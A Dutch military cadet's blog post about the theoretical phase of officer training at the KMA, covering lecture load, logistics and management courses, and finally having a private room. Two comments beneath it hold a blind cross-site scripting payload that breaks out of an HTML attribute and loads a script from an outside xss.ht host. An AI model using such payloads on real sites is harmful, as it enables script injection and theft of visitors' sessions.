Van veld- naar boekwerk

Dion - Officiersopleiding KMA

zaterdag 15 oktober 2016

Bij een opleiding tot militair denk je aan oefeningen in het veld, kaartlezen, schieten en nog meer 'spannende' dingen. De opleiding tot officier is echter veel meer dan dat.

Om goed voorbereid te zijn op je eerste officiersfunctie worden wij zowel praktisch (oefeningen in het veld) als theoretisch opgeleid. We zijn enkele weken geleden gestart met het theorietische deel van de opleiding. Dat is vooral veel les in collegevorm met een redelijk hoge studiedruk. Colleges van 08.10 tot 16.55 zijn dan ook geen uitzondering. Gelukkig doen de docenten wel altijd hun best om de lesstof zo leuk mogelijk te brengen. We hebben les van zowel militaire- als burgerdocenten. 

Vooral manager

Een van de vakken die we hier hebben is ‘Logistiek’, waarbij globaal het gehele logistieke proces van Defensie behandeld wordt. Natuurlijk blijff het vrij globaal, want expert word je pas als je naar de Logistieke Dienst gaat. Maar het is wel leerzaam om de basisbeginselen te leren. Interessant detail: logistiek kent zijn oorsprong vanuit de krijgswetenschap. Dus waar kan je het vak beter leren dan bij defensie? Daarnaast krijgen we ook managementvakken. Want als officier ben je naast 'krijger en diplomaat' ook vooral een manager. Daar hoort ook Nederlands en Engels bij, want als toekomstig officier moet je over een goede uitdrukkingsvaardigheid (zowel nationaal- als internationaal) beschikken. 

Eigen kamer

Het mooiste is misschien nog wel dat we eindelijk onze eigen kamers hebben. Het is wel even wennen, voorheen zaten we in het veld op elkaars lip, of lag je met andere cadetten op groepslegering. Maar nu dus niet meer en worden we dus in de gelegeneheid gesteld om rustig te kunnen studeren. Tot nu toe heb ik heb trouwens alle vakken in één keer gehaald. Daar ben ik echt enorm blij mee omdat het ook enorm veel werk scheelt. Want 'de KMA trein' dendert voort in hoog tempo. 

Tot een volgende blog,

Groet, Cadet Dion

Reacties ( 3 )

 1. AH
  aaa haha a 3 jaar geleden Reageer

  Geef

 2. AA
  aa"><script src=https://0xradi.xss.ht></script> aaa"><script src=https://0xradi.xss.ht></script> 3 jaar geleden Reageer

  .

 3. AA
  aa"><script src=https://0xradi.xss.ht></script> aaa"><script src=https://0xradi.xss.ht></script> 3 jaar geleden Reageer

  http://google.com 0

 • Jouw reactie

  Defensie Account
  Account aanmaken